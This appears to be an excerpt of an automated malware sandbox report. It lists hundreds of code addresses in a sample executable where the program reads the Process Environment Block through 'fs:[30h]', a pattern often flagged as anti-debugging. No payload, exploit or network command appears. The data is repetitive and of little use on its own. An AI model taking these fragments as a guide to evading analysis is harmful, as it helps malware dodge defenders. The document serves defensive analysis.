Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0112F0BF mov eax, dword ptr fs:[00000030h]	9_2_0112F0BF
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0112F0BF mov eax, dword ptr fs:[00000030h]	9_2_0112F0BF
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011220A0 mov eax, dword ptr fs:[00000030h]	9_2_011220A0
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011220A0 mov eax, dword ptr fs:[00000030h]	9_2_011220A0
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011220A0 mov eax, dword ptr fs:[00000030h]	9_2_011220A0
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011220A0 mov eax, dword ptr fs:[00000030h]	9_2_011220A0
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011220A0 mov eax, dword ptr fs:[00000030h]	9_2_011220A0
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011220A0 mov eax, dword ptr fs:[00000030h]	9_2_011220A0
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011390AF mov eax, dword ptr fs:[00000030h]	9_2_011390AF
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0118B8D0 mov eax, dword ptr fs:[00000030h]	9_2_0118B8D0
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0118B8D0 mov ecx, dword ptr fs:[00000030h]	9_2_0118B8D0
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0118B8D0 mov eax, dword ptr fs:[00000030h]	9_2_0118B8D0
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0118B8D0 mov eax, dword ptr fs:[00000030h]	9_2_0118B8D0
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0118B8D0 mov eax, dword ptr fs:[00000030h]	9_2_0118B8D0
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0118B8D0 mov eax, dword ptr fs:[00000030h]	9_2_0118B8D0
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_010F58EC mov eax, dword ptr fs:[00000030h]	9_2_010F58EC
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011B131B mov eax, dword ptr fs:[00000030h]	9_2_011B131B
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011C8B58 mov eax, dword ptr fs:[00000030h]	9_2_011C8B58
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_010FDB40 mov eax, dword ptr fs:[00000030h]	9_2_010FDB40
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_010FF358 mov eax, dword ptr fs:[00000030h]	9_2_010FF358
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01123B7A mov eax, dword ptr fs:[00000030h]	9_2_01123B7A
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01123B7A mov eax, dword ptr fs:[00000030h]	9_2_01123B7A
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_010FDB60 mov ecx, dword ptr fs:[00000030h]	9_2_010FDB60
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0112B390 mov eax, dword ptr fs:[00000030h]	9_2_0112B390
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01122397 mov eax, dword ptr fs:[00000030h]	9_2_01122397
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011B138A mov eax, dword ptr fs:[00000030h]	9_2_011B138A
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011AD380 mov ecx, dword ptr fs:[00000030h]	9_2_011AD380
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01101B8F mov eax, dword ptr fs:[00000030h]	9_2_01101B8F
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01101B8F mov eax, dword ptr fs:[00000030h]	9_2_01101B8F
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011C5BA5 mov eax, dword ptr fs:[00000030h]	9_2_011C5BA5
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01124BAD mov eax, dword ptr fs:[00000030h]	9_2_01124BAD
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01124BAD mov eax, dword ptr fs:[00000030h]	9_2_01124BAD
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01124BAD mov eax, dword ptr fs:[00000030h]	9_2_01124BAD
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011753CA mov eax, dword ptr fs:[00000030h]	9_2_011753CA
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011753CA mov eax, dword ptr fs:[00000030h]	9_2_011753CA
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011203E2 mov eax, dword ptr fs:[00000030h]	9_2_011203E2
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011203E2 mov eax, dword ptr fs:[00000030h]	9_2_011203E2
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011203E2 mov eax, dword ptr fs:[00000030h]	9_2_011203E2
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011203E2 mov eax, dword ptr fs:[00000030h]	9_2_011203E2
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011203E2 mov eax, dword ptr fs:[00000030h]	9_2_011203E2
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011203E2 mov eax, dword ptr fs:[00000030h]	9_2_011203E2
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0111DBE9 mov eax, dword ptr fs:[00000030h]	9_2_0111DBE9
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01113A1C mov eax, dword ptr fs:[00000030h]	9_2_01113A1C
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011BAA16 mov eax, dword ptr fs:[00000030h]	9_2_011BAA16
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011BAA16 mov eax, dword ptr fs:[00000030h]	9_2_011BAA16
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_010FAA16 mov eax, dword ptr fs:[00000030h]	9_2_010FAA16
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_010FAA16 mov eax, dword ptr fs:[00000030h]	9_2_010FAA16
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01108A0A mov eax, dword ptr fs:[00000030h]	9_2_01108A0A
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_010F5210 mov eax, dword ptr fs:[00000030h]	9_2_010F5210
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_010F5210 mov ecx, dword ptr fs:[00000030h]	9_2_010F5210
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_010F5210 mov eax, dword ptr fs:[00000030h]	9_2_010F5210
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_010F5210 mov eax, dword ptr fs:[00000030h]	9_2_010F5210
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01134A2C mov eax, dword ptr fs:[00000030h]	9_2_01134A2C
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01134A2C mov eax, dword ptr fs:[00000030h]	9_2_01134A2C
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011BEA55 mov eax, dword ptr fs:[00000030h]	9_2_011BEA55
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_010F9240 mov eax, dword ptr fs:[00000030h]	9_2_010F9240
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_010F9240 mov eax, dword ptr fs:[00000030h]	9_2_010F9240
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_010F9240 mov eax, dword ptr fs:[00000030h]	9_2_010F9240
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_010F9240 mov eax, dword ptr fs:[00000030h]	9_2_010F9240
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01184257 mov eax, dword ptr fs:[00000030h]	9_2_01184257
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0113927A mov eax, dword ptr fs:[00000030h]	9_2_0113927A
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011AB260 mov eax, dword ptr fs:[00000030h]	9_2_011AB260
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011AB260 mov eax, dword ptr fs:[00000030h]	9_2_011AB260
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011C8A62 mov eax, dword ptr fs:[00000030h]	9_2_011C8A62
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0112D294 mov eax, dword ptr fs:[00000030h]	9_2_0112D294
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0112D294 mov eax, dword ptr fs:[00000030h]	9_2_0112D294
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0110AAB0 mov eax, dword ptr fs:[00000030h]	9_2_0110AAB0
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0110AAB0 mov eax, dword ptr fs:[00000030h]	9_2_0110AAB0
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0112FAB0 mov eax, dword ptr fs:[00000030h]	9_2_0112FAB0
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_010F52A5 mov eax, dword ptr fs:[00000030h]	9_2_010F52A5
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_010F52A5 mov eax, dword ptr fs:[00000030h]	9_2_010F52A5
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_010F52A5 mov eax, dword ptr fs:[00000030h]	9_2_010F52A5
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_010F52A5 mov eax, dword ptr fs:[00000030h]	9_2_010F52A5
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_010F52A5 mov eax, dword ptr fs:[00000030h]	9_2_010F52A5
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01122ACB mov eax, dword ptr fs:[00000030h]	9_2_01122ACB
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01122AE4 mov eax, dword ptr fs:[00000030h]	9_2_01122AE4
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0117A537 mov eax, dword ptr fs:[00000030h]	9_2_0117A537
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011BE539 mov eax, dword ptr fs:[00000030h]	9_2_011BE539
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01103D34 mov eax, dword ptr fs:[00000030h]	9_2_01103D34
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01103D34 mov eax, dword ptr fs:[00000030h]	9_2_01103D34
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01103D34 mov eax, dword ptr fs:[00000030h]	9_2_01103D34
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01103D34 mov eax, dword ptr fs:[00000030h]	9_2_01103D34
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01103D34 mov eax, dword ptr fs:[00000030h]	9_2_01103D34
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01103D34 mov eax, dword ptr fs:[00000030h]	9_2_01103D34
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01103D34 mov eax, dword ptr fs:[00000030h]	9_2_01103D34
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01103D34 mov eax, dword ptr fs:[00000030h]	9_2_01103D34
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01103D34 mov eax, dword ptr fs:[00000030h]	9_2_01103D34
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01103D34 mov eax, dword ptr fs:[00000030h]	9_2_01103D34
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01103D34 mov eax, dword ptr fs:[00000030h]	9_2_01103D34
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01103D34 mov eax, dword ptr fs:[00000030h]	9_2_01103D34
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01103D34 mov eax, dword ptr fs:[00000030h]	9_2_01103D34
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011C8D34 mov eax, dword ptr fs:[00000030h]	9_2_011C8D34
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01124D3B mov eax, dword ptr fs:[00000030h]	9_2_01124D3B
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01124D3B mov eax, dword ptr fs:[00000030h]	9_2_01124D3B
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01124D3B mov eax, dword ptr fs:[00000030h]	9_2_01124D3B
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_010FAD30 mov eax, dword ptr fs:[00000030h]	9_2_010FAD30
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01117D50 mov eax, dword ptr fs:[00000030h]	9_2_01117D50
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01133D43 mov eax, dword ptr fs:[00000030h]	9_2_01133D43
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01173540 mov eax, dword ptr fs:[00000030h]	9_2_01173540
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0111C577 mov eax, dword ptr fs:[00000030h]	9_2_0111C577
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0111C577 mov eax, dword ptr fs:[00000030h]	9_2_0111C577
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_010F2D8A mov eax, dword ptr fs:[00000030h]	9_2_010F2D8A
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_010F2D8A mov eax, dword ptr fs:[00000030h]	9_2_010F2D8A
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_010F2D8A mov eax, dword ptr fs:[00000030h]	9_2_010F2D8A
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_010F2D8A mov eax, dword ptr fs:[00000030h]	9_2_010F2D8A
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_010F2D8A mov eax, dword ptr fs:[00000030h]	9_2_010F2D8A
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0112FD9B mov eax, dword ptr fs:[00000030h]	9_2_0112FD9B
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0112FD9B mov eax, dword ptr fs:[00000030h]	9_2_0112FD9B
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01122581 mov eax, dword ptr fs:[00000030h]	9_2_01122581
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01122581 mov eax, dword ptr fs:[00000030h]	9_2_01122581
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01122581 mov eax, dword ptr fs:[00000030h]	9_2_01122581
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01122581 mov eax, dword ptr fs:[00000030h]	9_2_01122581
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01121DB5 mov eax, dword ptr fs:[00000030h]	9_2_01121DB5
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01121DB5 mov eax, dword ptr fs:[00000030h]	9_2_01121DB5
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01121DB5 mov eax, dword ptr fs:[00000030h]	9_2_01121DB5
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011C05AC mov eax, dword ptr fs:[00000030h]	9_2_011C05AC
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011C05AC mov eax, dword ptr fs:[00000030h]	9_2_011C05AC
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011235A1 mov eax, dword ptr fs:[00000030h]	9_2_011235A1
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01176DC9 mov eax, dword ptr fs:[00000030h]	9_2_01176DC9
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01176DC9 mov eax, dword ptr fs:[00000030h]	9_2_01176DC9
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01176DC9 mov eax, dword ptr fs:[00000030h]	9_2_01176DC9
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01176DC9 mov ecx, dword ptr fs:[00000030h]	9_2_01176DC9
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01176DC9 mov eax, dword ptr fs:[00000030h]	9_2_01176DC9
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01176DC9 mov eax, dword ptr fs:[00000030h]	9_2_01176DC9
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011A8DF1 mov eax, dword ptr fs:[00000030h]	9_2_011A8DF1
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0110D5E0 mov eax, dword ptr fs:[00000030h]	9_2_0110D5E0
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0110D5E0 mov eax, dword ptr fs:[00000030h]	9_2_0110D5E0
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011BFDE2 mov eax, dword ptr fs:[00000030h]	9_2_011BFDE2
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011BFDE2 mov eax, dword ptr fs:[00000030h]	9_2_011BFDE2
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011BFDE2 mov eax, dword ptr fs:[00000030h]	9_2_011BFDE2
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011BFDE2 mov eax, dword ptr fs:[00000030h]	9_2_011BFDE2
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011C740D mov eax, dword ptr fs:[00000030h]	9_2_011C740D
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011C740D mov eax, dword ptr fs:[00000030h]	9_2_011C740D
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011C740D mov eax, dword ptr fs:[00000030h]	9_2_011C740D
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011B1C06 mov eax, dword ptr fs:[00000030h]	9_2_011B1C06
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011B1C06 mov eax, dword ptr fs:[00000030h]	9_2_011B1C06
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011B1C06 mov eax, dword ptr fs:[00000030h]	9_2_011B1C06
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011B1C06 mov eax, dword ptr fs:[00000030h]	9_2_011B1C06
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011B1C06 mov eax, dword ptr fs:[00000030h]	9_2_011B1C06
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011B1C06 mov eax, dword ptr fs:[00000030h]	9_2_011B1C06
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011B1C06 mov eax, dword ptr fs:[00000030h]	9_2_011B1C06
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011B1C06 mov eax, dword ptr fs:[00000030h]	9_2_011B1C06
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011B1C06 mov eax, dword ptr fs:[00000030h]	9_2_011B1C06
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011B1C06 mov eax, dword ptr fs:[00000030h]	9_2_011B1C06
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011B1C06 mov eax, dword ptr fs:[00000030h]	9_2_011B1C06
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011B1C06 mov eax, dword ptr fs:[00000030h]	9_2_011B1C06
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011B1C06 mov eax, dword ptr fs:[00000030h]	9_2_011B1C06
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011B1C06 mov eax, dword ptr fs:[00000030h]	9_2_011B1C06
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01176C0A mov eax, dword ptr fs:[00000030h]	9_2_01176C0A
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01176C0A mov eax, dword ptr fs:[00000030h]	9_2_01176C0A
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01176C0A mov eax, dword ptr fs:[00000030h]	9_2_01176C0A
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01176C0A mov eax, dword ptr fs:[00000030h]	9_2_01176C0A
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0112BC2C mov eax, dword ptr fs:[00000030h]	9_2_0112BC2C
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0118C450 mov eax, dword ptr fs:[00000030h]	9_2_0118C450
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0118C450 mov eax, dword ptr fs:[00000030h]	9_2_0118C450
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0112A44B mov eax, dword ptr fs:[00000030h]	9_2_0112A44B
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0111746D mov eax, dword ptr fs:[00000030h]	9_2_0111746D
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0110849B mov eax, dword ptr fs:[00000030h]	9_2_0110849B
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011C8CD6 mov eax, dword ptr fs:[00000030h]	9_2_011C8CD6
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011B14FB mov eax, dword ptr fs:[00000030h]	9_2_011B14FB
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01176CF0 mov eax, dword ptr fs:[00000030h]	9_2_01176CF0
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01176CF0 mov eax, dword ptr fs:[00000030h]	9_2_01176CF0
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01176CF0 mov eax, dword ptr fs:[00000030h]	9_2_01176CF0
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0111F716 mov eax, dword ptr fs:[00000030h]	9_2_0111F716
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0118FF10 mov eax, dword ptr fs:[00000030h]	9_2_0118FF10
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0118FF10 mov eax, dword ptr fs:[00000030h]	9_2_0118FF10
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011C070D mov eax, dword ptr fs:[00000030h]	9_2_011C070D
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011C070D mov eax, dword ptr fs:[00000030h]	9_2_011C070D
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0112A70E mov eax, dword ptr fs:[00000030h]	9_2_0112A70E
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0112A70E mov eax, dword ptr fs:[00000030h]	9_2_0112A70E
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_010F4F2E mov eax, dword ptr fs:[00000030h]	9_2_010F4F2E
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_010F4F2E mov eax, dword ptr fs:[00000030h]	9_2_010F4F2E
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0112E730 mov eax, dword ptr fs:[00000030h]	9_2_0112E730
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0110EF40 mov eax, dword ptr fs:[00000030h]	9_2_0110EF40
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0110FF60 mov eax, dword ptr fs:[00000030h]	9_2_0110FF60
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011C8F6A mov eax, dword ptr fs:[00000030h]	9_2_011C8F6A
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01177794 mov eax, dword ptr fs:[00000030h]	9_2_01177794
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01177794 mov eax, dword ptr fs:[00000030h]	9_2_01177794
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01177794 mov eax, dword ptr fs:[00000030h]	9_2_01177794
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01108794 mov eax, dword ptr fs:[00000030h]	9_2_01108794
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011337F5 mov eax, dword ptr fs:[00000030h]	9_2_011337F5
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0112A61C mov eax, dword ptr fs:[00000030h]	9_2_0112A61C
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0112A61C mov eax, dword ptr fs:[00000030h]	9_2_0112A61C
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_010FC600 mov eax, dword ptr fs:[00000030h]	9_2_010FC600
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_010FC600 mov eax, dword ptr fs:[00000030h]	9_2_010FC600
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_010FC600 mov eax, dword ptr fs:[00000030h]	9_2_010FC600
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01128E00 mov eax, dword ptr fs:[00000030h]	9_2_01128E00
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011B1608 mov eax, dword ptr fs:[00000030h]	9_2_011B1608
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011AFE3F mov eax, dword ptr fs:[00000030h]	9_2_011AFE3F
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_010FE620 mov eax, dword ptr fs:[00000030h]	9_2_010FE620
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01107E41 mov eax, dword ptr fs:[00000030h]	9_2_01107E41
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01107E41 mov eax, dword ptr fs:[00000030h]	9_2_01107E41
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01107E41 mov eax, dword ptr fs:[00000030h]	9_2_01107E41
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01107E41 mov eax, dword ptr fs:[00000030h]	9_2_01107E41
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01107E41 mov eax, dword ptr fs:[00000030h]	9_2_01107E41
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01107E41 mov eax, dword ptr fs:[00000030h]	9_2_01107E41
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011BAE44 mov eax, dword ptr fs:[00000030h]	9_2_011BAE44
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011BAE44 mov eax, dword ptr fs:[00000030h]	9_2_011BAE44
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0111AE73 mov eax, dword ptr fs:[00000030h]	9_2_0111AE73
